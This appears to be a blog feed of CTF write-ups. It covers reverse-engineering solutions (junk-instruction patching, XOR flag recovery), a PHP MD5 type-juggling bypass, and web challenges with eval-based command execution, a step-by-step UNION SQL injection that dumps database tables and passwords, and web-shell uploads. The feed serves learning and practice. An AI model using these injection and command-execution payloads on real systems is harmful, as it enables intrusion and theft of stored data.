<span class="hljs-type">char</span> **envp)</span><br>{<br> <span class="hljs-type">signed</span> <span class="hljs-type">int</span> v3; <span class="hljs-comment">// kr00_4</span><br> <span class="hljs-type">int</span> i; <span class="hljs-comment">// edx</span><br> <span class="hljs-type">char</span> v5; <span class="hljs-comment">// cl</span><br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> j; <span class="hljs-comment">// edx</span><br> <span class="hljs-type">int</span> v7; <span class="hljs-comment">// eax</span><br> <span class="hljs-type">char</span> v8; <span class="hljs-comment">// [esp+0h] [ebp-44h]</span><br> <span class="hljs-type">char</span> v9; <span class="hljs-comment">// [esp+0h] [ebp-44h]</span><br> <span class="hljs-type">char</span> 
Arglist[<span class="hljs-number">48</span>]; <span class="hljs-comment">// [esp+10h] [ebp-34h] BYREF</span><br><br> sub_401020(<span class="hljs-string">"please input flag\n"</span>, v8);<br> sub_401050(<span class="hljs-string">"%s"</span>, (<span class="hljs-type">char</span>)Arglist);<br> v3 = <span class="hljs-built_in">strlen</span>(Arglist);<br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i < v3 / <span class="hljs-number">2</span>; ++i )<br> {<br> v5 = Arglist[<span class="hljs-number">2</span> * i];<br> Arglist[<span class="hljs-number">2</span> * i] = Arglist[<span class="hljs-number">2</span> * i + <span class="hljs-number">1</span>];<br> Arglist[<span class="hljs-number">2</span> * i + <span class="hljs-number">1</span>] = v5;<br> }<br> <span class="hljs-keyword">for</span> ( j = <span class="hljs-number">0</span>; j < <span class="hljs-built_in">strlen</span>(Arglist); ++j )<br> Arglist[j] ^= <span class="hljs-number">0x30</span>u;<br> v7 = <span class="hljs-built_in">strcmp</span>(Arglist, <span class="hljs-string">"c~scvdzKCEoDEZ[^roDICUMC"</span>);<br> <span class="hljs-keyword">if</span> ( v7 )<br> v7 = v7 < <span class="hljs-number">0</span> ? 
<span class="hljs-number">-1</span> : <span class="hljs-number">1</span>;<br> <span class="hljs-keyword">if</span> ( !v7 )<br> {<br> sub_401020(<span class="hljs-string">"yes"</span>, v9);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> }<br> sub_401020(<span class="hljs-string">"error"</span>, v9);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br>}<br></code></pre></td></tr></table></figure><p>From the code we can see what we need: we already have the encrypted string, so first XOR it back, then undo the earlier swap.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.3qj9ibdwap80.webp"></p><p>Then, using the data recovered above, write code to swap the positions back.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python">a=<span class="hljs-string">'SNCSFTJ{su_tujknB_tyse}s'</span><br>secret=<span class="hljs-built_in">list</span>(a)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-number">12</span>):<br> deme=secret[<span class="hljs-number">2</span>*i+<span class="hljs-number">1</span>]<br> secret[<span class="hljs-number">2</span>*i+<span class="hljs-number">1</span>] = secret[<span class="hljs-number">2</span>*i]<br> secret[<span class="hljs-number">2</span>*i]=deme<br><br>result=<span class="hljs-string">''</span>.join(secret)<br><br><span class="hljs-built_in">print</span>(result,end=<span class="hljs-string">''</span>)<br><br><span class="hljs-comment"># NSSCTF{Just_junk_Bytess}</span><br></code></pre></td></tr></table></figure><h2 id="SWPUCTF-2021-新生赛-easyapp"><a href="#SWPUCTF-2021-新生赛-easyapp" class="headerlink" title="[SWPUCTF 2021 Freshman Contest]easyapp"></a>[SWPUCTF 2021 Freshman Contest]easyapp</h2><p>First rename the attachment to a .zip extension and extract it; once extracted, open it in jadx and go straight to the main function to analyze it.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.5lfec6bnq680.webp"></p><p>We can see that this is the main function.</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-comment">/* synthetic */</span> <span class="hljs-keyword">void</span> lambda$onCreate$<span class="hljs-number">0</span>$MainActivity(<span class="hljs-keyword">final</span> EditText editText, View v) {<br> System.out.println(encoder.encode(editText.getText().toString()));<br> <span class="hljs-keyword">if</span> (encoder.encode(editText.getText().toString()).equals(<span class="hljs-string">"棿棢棢棲棥棷棊棐棁棚棨棨棵棢棌"</span>)) {<br> Toast.makeText(<span class="hljs-built_in">this</span>, <span class="hljs-string">"YES"</span>, <span class="hljs-number">0</span>).show();<br> } <span class="hljs-keyword">else</span> {<br> Toast.makeText(<span class="hljs-built_in">this</span>, <span class="hljs-string">"NO"</span>, <span class="hljs-number">0</span>).show();<br> }<br>}<br></code></pre></td></tr></table></figure><p>Two functions are referenced earlier on; let's look at them one by one.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.1cftb7q0szxc.webp"></p><p>We can see that the first encryption function uses a key of 123456789 and XORs it with the input.</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> com.example.ilililililil;<br><br><span class="hljs-comment">/* loaded from: classes.dex */</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Encoder</span> {<br> <span class="hljs-keyword">private</span> <span class="hljs-type">int</span> <span class="hljs-variable">key</span> <span class="hljs-operator">=</span> <span class="hljs-number">123456789</span>;<br><br> <span class="hljs-keyword">public</span> String <span class="hljs-title function_">encode</span><span class="hljs-params">(String str)</span> {<br> <span class="hljs-type">StringBuilder</span> <span class="hljs-variable">sb</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">StringBuilder</span>();<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">char</span> c : str.toCharArray()) {<br> sb.append((<span class="hljs-type">char</span>) (c ^ <span class="hljs-built_in">this</span>.key));<br> }<br> <span class="hljs-keyword">return</span> sb.toString();<br> }<br>}<br></code></pre></td></tr></table></figure><p>Let's look at the next function. This is the trap: it changes the key in the first class to 987654321, so the key used by the later XOR is 987654321.</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> com.example.ilililililil;<br><br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><br><span class="hljs-comment">/* loaded from: classes.dex */</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">MainActlvity</span> {<br> <span class="hljs-keyword">public</span> <span class="hljs-title function_">MainActlvity</span><span class="hljs-params">()</span> {<br> <span class="hljs-keyword">try</span> {<br> <span class="hljs-type">Field</span> <span class="hljs-variable">declaredField</span> <span class="hljs-operator">=</span> Encoder.class.getDeclaredField(<span class="hljs-string">"key"</span>);<br> declaredField.setAccessible(<span class="hljs-literal">true</span>);<br> declaredField.set(MainActivity.encoder, <span class="hljs-number">987654321</span>);<br> } <span class="hljs-keyword">catch</span> (IllegalAccessException | NoSuchFieldException e) {<br> e.printStackTrace();<br> }<br> }<br>}<br></code></pre></td></tr></table></figure><p>Now we know both the XOR key and the ciphertext, so we can go straight to writing a script to solve the challenge.</p><p>Note one crucial point: the apk works with Unicode characters, but ASCII only covers 0x0-0xFF, so at the end the result has to be cut back down to that range (255, i.e. 0xff; the script below takes the value mod 128).</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python">code=<span class="hljs-string">'棿棢棢棲棥棷棊棐棁棚棨棨棵棢棌'</span><br>key = <span class="hljs-number">987654321</span><br>flag=<span class="hljs-string">""</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> code:<br> flag+=<span class="hljs-built_in">chr</span>((<span class="hljs-built_in">ord</span>(i)^key)%<span class="hljs-number">128</span>) <span class="hljs-comment"># keep the value within 0~128</span><br><span class="hljs-built_in">print</span>(flag)<br><br><span class="hljs-comment"># NSSCTF{apkYYDS}</span><br></code></pre></td></tr></table></figure>]]></content>
<summary type="html"><h1 id="花指令"><a href="#花指令" class="headerlink" title="Junk instructions"></a>Junk instructions</h1><p><a href="https://blog.csdn.net/Captain_RB/article/details/123858864">Summary of junk instructions - Captain_RB's blog - CSDN Blog</a></p>
<h2 id="NSSRound-3-Team-jump-by-jump"><a href="#NSSRound-3-Team-jump-by-jump" class="headerlink" title="[NSSRound#3 Team]jump_by_jump"></a>[NSSRound#3 Team]jump_by_jump</h2><p>[<a href="https://www.nssctf.cn/problem/2313">NSSRound#3 Team]jump_by_jump | NSSCTF</a></p>
<p>The reason I am recording this challenge is that it contains junk instructions, the simplest kind.</p>
<p>First we open it in IDA. We can see that main calls a flag function, but it is not shown; switching to the disassembly view reveals junk instructions that stop it from being decompiled.</p>
<p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.l5jcce610eo.webp"></p>
<p>Its characteristics point to the multi-byte-instruction trick. At 41188C (the call, jmp or similar jump instruction), press D to convert it to data and NOP out the E8.</p>
<p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.6qkaosh9hjk0.webp"></p>
<p>At the same time we notice that a lot of code has turned yellow; press C on each of these yellow regions to turn them back into code. Finally, select all of the code, press D to convert it to data, press C to convert it to code, and press P to rebuild it as a function. That removes this simplest class of junk instruction, and inside the function we find the flag.</p>
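<p>The manual D / NOP / C / P routine above patches one junk byte at a time. As an added illustration (this is not the author's script and is not derived from the challenge binary, which is not on this page), the Python below finds the classic jz/jnz junk-byte pattern in a raw code buffer and NOPs the hidden E8/E9 opcode, refusing to patch any byte that is not one of those opcodes. The exact byte pattern it matches, the constructed sample bytes, and all function names are assumptions made for this example.</p>

```python
"""Locate and neutralise the jz/jnz opaque-predicate junk byte.

Added example for this write-up, not the author's script. The pattern
handled here is an assumption, the classic
    74 03   jz  short +3
    75 01   jnz short +1
    E9      junk opcode (E8 is also common)
in which both conditional jumps land on the byte right after the junk
opcode, so the E9/E8 can never execute and only exists to make the
disassembler swallow the next four bytes as an operand. NOPing that one
byte is the same fix the write-up applies by hand in IDA.
"""


def jump_target(offset: int, disp_byte: int) -> int:
    """Target of a 2-byte short jump at `offset` with rel8 `disp_byte`."""
    rel8 = int.from_bytes(bytes([disp_byte]), "little", signed=True)
    return offset + 2 + rel8


def find_junk_jumps(code: bytes) -> list:
    """Return offsets of junk opcodes hidden behind a jz/jnz pair.

    A hit needs: jz at i, jnz at i+2, both targeting i+5, and an
    E8/E9 opcode at i+4 (the byte both jumps step over).
    """
    hits = []
    for i in range(len(code) - 4):
        if code[i] != 0x74 or code[i + 2] != 0x75:
            continue
        if jump_target(i, code[i + 1]) != i + 5:
            continue
        if jump_target(i + 2, code[i + 3]) != i + 5:
            continue
        if code[i + 4] in (0xE8, 0xE9):
            hits.append(i + 4)
    return hits


def nop_byte(code: bytes, offset: int, expected: tuple = (0xE8, 0xE9)) -> bytes:
    """Return a copy of `code` with one byte replaced by NOP (0x90).

    Refuses to patch unless the byte is one we expect, so a wrong offset
    (for instance a virtual address passed where a file offset was
    needed) fails loudly instead of silently corrupting real code.
    """
    if code[offset] not in expected:
        raise ValueError(f"byte at {offset:#x} is {code[offset]:#04x}, not a junk opcode")
    patched = bytearray(code)
    patched[offset] = 0x90
    return bytes(patched)


def remove_junk(code: bytes) -> bytes:
    """Patch every detected junk opcode. The jz/jnz pair itself is left
    alone: once the byte after it is a NOP it is harmless and IDA will
    decode straight through it."""
    for off in find_junk_jumps(code):
        code = nop_byte(code, off)
    return code


# Constructed sample (not from the challenge): two junk sites wrapped
# around real code `mov eax, [ebp-4]` (8B 45 FC) and `ret` (C3).
SAMPLE = bytes.fromhex(
    "74037501E9" "8B45FC"
    "74037501E8" "C3"
)

# A near miss: the jnz displacement is 2, so the two jumps disagree and
# the E9 could be a genuine jmp. It must not be patched.
NEAR_MISS = bytes.fromhex("74037502E9" "00000000")

if __name__ == "__main__":
    print("junk opcodes at", [hex(o) for o in find_junk_jumps(SAMPLE)])
    print("patched:", remove_junk(SAMPLE).hex())
```

<p>Run it over a code section dumped from the file (file offsets, not virtual addresses); <code>nop_byte</code> checks the opcode before writing, so a mistyped offset raises instead of damaging real instructions. It generalises the single-site manual patch above to every occurrence of the pattern in the buffer.</p>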
<p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.3x3dpjarkq60.webp"></p></summary>
<category term="ctf" scheme="https://shenshuoyaoyouguangha.github.io/tags/ctf/"/>
<category term="re" scheme="https://shenshuoyaoyouguangha.github.io/tags/re/"/>
</entry>
<entry>
<title>web入门记录</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/09/21/web%E5%85%A5%E9%97%A8%E8%AE%B0%E5%BD%95/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/09/21/web%E5%85%A5%E9%97%A8%E8%AE%B0%E5%BD%95/</id>
<published>2023-09-21T05:45:27.000Z</published>
<updated>2023-12-18T05:33:32.691Z</updated>
<content type="html"><![CDATA[<p>==md5($_POST['b'])){ die("success!"); })</p><p><a href="https://blog.csdn.net/q20010619/article/details/109856150">MD5 weak typing in CTF (ALL_IN_ONE) - OceanSec's blog - CSDN Blog</a></p><p>Example: [<a href="https://www.nssctf.cn/problem/2076">NSSCTF 2022 Spring Recruit]babyphp | NSSCTF</a></p><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta"><?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-keyword">include_once</span>(<span class="hljs-string">'flag.php'</span>);<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'a'</span>])&&!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">'/[0-9]/'</span>,<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'a'</span>])&&<span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'a'</span>])){<br> <span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span 
class="hljs-string">'b1'</span>])&&<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'b2'</span>]){<br> <span class="hljs-keyword">if</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'b1'</span>]!=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'b2'</span>]&&<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'b1'</span>])===<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'b2'</span>])){<br> <span class="hljs-keyword">if</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c1'</span>]!=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c2'</span>]&&<span class="hljs-title function_ invoke__">is_string</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c1'</span>])&&<span class="hljs-title function_ invoke__">is_string</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c2'</span>])&&<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c1'</span>])==<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c2'</span>])){<br> <span class="hljs-keyword">echo</span> <span class="hljs-variable">$flag</span>;<br> }<span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"yee"</span>;<br> }<br> }<span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"nop"</span>;<br> }<br> }<span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"go on"</span>;<br> }<br>}<span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"let's get some 
php"</span>;<br>}<br><span class="hljs-meta">?></span> <br></code></pre></td></tr></table></figure><p>We can see that there are three layers of comparison in total, and we need to bypass them one layer at a time.</p><p>The first layer requires that:</p><ul><li>the "a" field exists;</li><li>the value of "a" contains no digit characters;</li><li>the value of "a" converts to a non-zero integer.</li></ul><p>We can use an array to get around this check: for an array no hash value is produced, so whatever the value is, the condition holds.</p><p>The second layer takes b1 and b2 and does a strict MD5 comparison.</p><p>This can also be bypassed directly with arrays.</p><p>The third layer is a loose MD5 comparison; here we just use strings whose MD5 hash begins with 0e.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.6gwbpclsays0.webp" alt="image-20230923170343632"></p>]]></content>
<summary type="html"><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/202308172151534.jpg"></p></summary>
<category term="ctf" scheme="https://shenshuoyaoyouguangha.github.io/tags/ctf/"/>
<category term="Web" scheme="https://shenshuoyaoyouguangha.github.io/tags/Web/"/>
</entry>
<entry>
<title>litctf</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/09/19/litctf/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/09/19/litctf/</id>
<published>2023-09-19T08:45:20.000Z</published>
<updated>2023-12-18T05:25:30.601Z</updated>
<content type="html"><![CDATA[<h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><p><img src="/./../image/image-20231218132527404.png" alt="image-20231218132527404"></p><h2 id="LitCTF-2023-我Flag呢?"><a href="#LitCTF-2023-我Flag呢?" class="headerlink" title="[LitCTF 2023]我Flag呢?"></a>[LitCTF 2023]我Flag呢?</h2><p>打开环境后,直接F12就可以看到flag</p><p>同时打开源码的方式还有</p><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">f12<span class="hljs-regexp">/ctrl+u/</span>view-<span class="hljs-keyword">source</span>:<br></code></pre></td></tr></table></figure><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/%7B4038CD4C-5AD6-45cc-B79F-734765D74244%7D.74m3u0jfzps0.webp"></p><span id="more"></span> <h2 id="LitCTF-2023-PHP是世界上最好的语言!!"><a href="#LitCTF-2023-PHP是世界上最好的语言!!" class="headerlink" title="[LitCTF 2023]PHP是世界上最好的语言!!"></a>[LitCTF 2023]PHP是世界上最好的语言!!</h2><p>打开页面,猜测命令执行</p><p>system(“ls /“); 查看目录文件夹,看到flag文件直接查看即可</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.4m4th4lnkqg0.png"></p><h2 id="LitCTF-2023-就当无事发生"><a href="#LitCTF-2023-就当无事发生" class="headerlink" title="[LitCTF 2023]就当无事发生"></a>[LitCTF 2023]就当无事发生</h2><p>首先去探姬的github,然后直接搜索他的博客地址</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/0bc762429c6478832b423983f5f49c8e.2fr8flw6sa80.webp"></p><p>随后直接点击这个按钮,可以查看作者对文件的更改</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.2r551bvk57c0.webp"></p><p>最后在里面找到带有X号的,就是作者删除过的,或者点上面的√可以看到作者的更改</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/%7B7E1532FA-9E7A-4e87-A5FE-C4EB552A98AF%7D.112w5kxubstc.webp"></p><h2 id="LitCTF-2023-Follow-me-and-hack-me"><a href="#LitCTF-2023-Follow-me-and-hack-me" class="headerlink" title="[LitCTF 2023]Follow me and hack me"></a>[LitCTF 2023]Follow me and hack 
me</h2><p>Just use HackBar to pass the parameters.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/8160496c03f53fa83615d0212465ef11.12lqjzm7lqf4.webp"></p><h2 id="LitCTF-2023-Vim-yyds"><a href="#LitCTF-2023-Vim-yyds" class="headerlink" title="[LitCTF 2023]Vim yyds"></a>[LitCTF 2023]Vim yyds</h2><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx">vim -r xxx.swp<br></code></pre></td></tr></table></figure><p>For example, if I open a file with vim 1.php and the session is killed partway through, Vim leaves this swap file behind; running vim -r on it restores the unsaved buffer.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/15250cfd706242cbaf0aa0e5a8f97bab.67gq0p6qvn40.webp"></p><p>Back to the challenge: download the swap file, then recover it on Kali.</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">node4<span 
class="hljs-selector-class">.anna</span>.nssctf.cn:28647/.index.php.swp<br></code></pre></td></tr></table></figure><p>Now we have its PHP source.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.6pidz6qpuog0.webp"></p><p>The logic is simple: the page expects a POST parameter whose value is the base64 encoding of 'Give_Me_You_Flag',</p><p>and then a parameter named cmd. Because cmd is wrapped in eval(), we can execute arbitrary code through it.</p><p>Capture and modify the request in Burp to get the flag.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.28caqntwhedc.webp"></p><h2 id="LitCTF-2023-这是什么?SQL-!注一下-!"><a href="#LitCTF-2023-这是什么?SQL-!注一下-!" class="headerlink" title="[LitCTF 2023]这是什么?SQL !注一下 !"></a>[LitCTF 2023]这是什么?SQL !注一下 !</h2><p><a href="https://www.bilibili.com/video/BV1ZR4y1Y745/?spm_id_from=333.880.my_history.page.click&vd_source=c195ba0f6cdc7f783321bd952f37fd18">SQL注入攻击原理,方法和类型_哔哩哔哩_bilibili</a></p><p><a href="https://blog.csdn.net/A951860555/article/details/116484328">SQL注入的一般过程_sql注入过程___lifanxin的博客-CSDN博客</a></p><p>As a web newbie I spent a whole day on this and still could not follow it at all, so I am just recording the steps for this challenge and will come back to the theory later.</p><p>I can, however, explain what each query does.</p><p>Start with id=1 to determine whether the injection point is numeric or string-typed:</p><p>if id=1 returns data, it is numeric;</p><p>if id='1' returns data, it is a string.</p><p>Since id=1 returns data, we conclude this is a numeric injection.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.2pssl53e6kq0.webp"></p><p><a href="https://blog.csdn.net/qq_23667585/article/details/127213099">浅谈SQL注入中的-1‘ union select 1,2,3#_娄不夜的博客-CSDN博客</a></p><p>1. First find which columns are echoed back; payload:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">-1)))))) union select 1,2#<br></code></pre></td></tr></table></figure><p>There is a lot packed into this first query; see the article above for the details. Writeup reference:</p><p>[<a 
href="https://blog.csdn.net/Leaf_initial/article/details/130671885">LitCTF2023] web方向全题解wp_Leafzzz__的博客-CSDN博客</a></p><p>2. Enumerate the databases:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">1)))))) and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata#<br></code></pre></td></tr></table></figure><p>The 1=2 is there to make the original condition false; in my tests id=-1)))))) union… behaves the same way. Either way the original WHERE clause matches nothing, so the first query's row is not displayed and the row from the UNIONed query is shown instead.</p><p>3. Database names obtained:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">information_schema,mysql,ctftraining,performance_schema,test,ctf<br></code></pre></td></tr></table></figure><p>4. Enumerate the tables:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">1)))))) and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema="ctf"#<br></code></pre></td></tr></table></figure><p>5. Table name obtained:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">users<br></code></pre></td></tr></table></figure><p>6. Enumerate the columns:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">1)))))) and 1=2 union select 1,<span 
class="hljs-title function_ invoke__">group_concat</span>(column_name)from information_schema.columns where table_name="users"#<br></code></pre></td></tr></table></figure><p>7. Column names obtained:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">id,username,password,ip,time,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password<br></code></pre></td></tr></table></figure><p>8. Dump the values:</p><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">1)))))) and 1=2 union select 1,group_concat(password) from ctf.users#<br></code></pre></td></tr></table></figure><p>9. An Easter egg (lol):</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">OHHHHHHH,F1rst_to_Th3_eggggggggg!} <br></code></pre></td></tr></table></figure><p>The flag works the same way: enumerate the ctftraining database instead.</p><p>10. Enumerate the tables again:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">1)))))) and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema=<span 
class="hljs-string">"ctftraining"</span>#<br></code></pre></td></tr></table></figure><p>11. Table names obtained:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">flag,news,users<br></code></pre></td></tr></table></figure><p>12. Enumerate the columns again:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">1)))))) and 1=2 union select 1,group_concat(column_name)from information_schema.columns where table_name="flag"#<br></code></pre></td></tr></table></figure><p>13. Column name obtained:</p><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf">flag<br></code></pre></td></tr></table></figure><p>14. Dump the value again:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">1)))))) and 1=2 union select 1,group_concat(flag) from ctftraining.flag#<br></code></pre></td></tr></table></figure><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.2vs4use82qa0.webp"></p><h4 id="webshell:需要上传木马以及蚁剑的使用"><a href="#webshell:需要上传木马以及蚁剑的使用" class="headerlink" 
title="webshell:需要上传木马以及蚁剑的使用"></a>webshell: uploading a web shell and connecting with AntSword</h4><p>Big shells, small shells, one-liner shells and so on: upload one, then connect to it with AntSword (蚁剑).</p><p><a href="https://www.bilibili.com/video/BV1Wk4y1m7fp/?spm_id_from=333.337.search-card.all.click&vd_source=c195ba0f6cdc7f783321bd952f37fd18">如何使用中国蚁剑连接webshell?_哔哩哔哩_bilibili</a></p><h2 id="LitCTF-2023-Http-pro-max-plus"><a href="#LitCTF-2023-Http-pro-max-plus" class="headerlink" title="[LitCTF 2023]Http pro max plus"></a>[LitCTF 2023]Http pro max plus</h2><p>A challenge about HTTP request headers; the site below documents them in detail. Every header in the list that follows is supplied by the client, which is exactly why a server that makes access decisions on them can be talked into anything.</p><p><a href="https://developer.mozilla.org/zh-CN/docs/web/http/headers">HTTP 标头(header) - HTTP | MDN (mozilla.org)</a></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 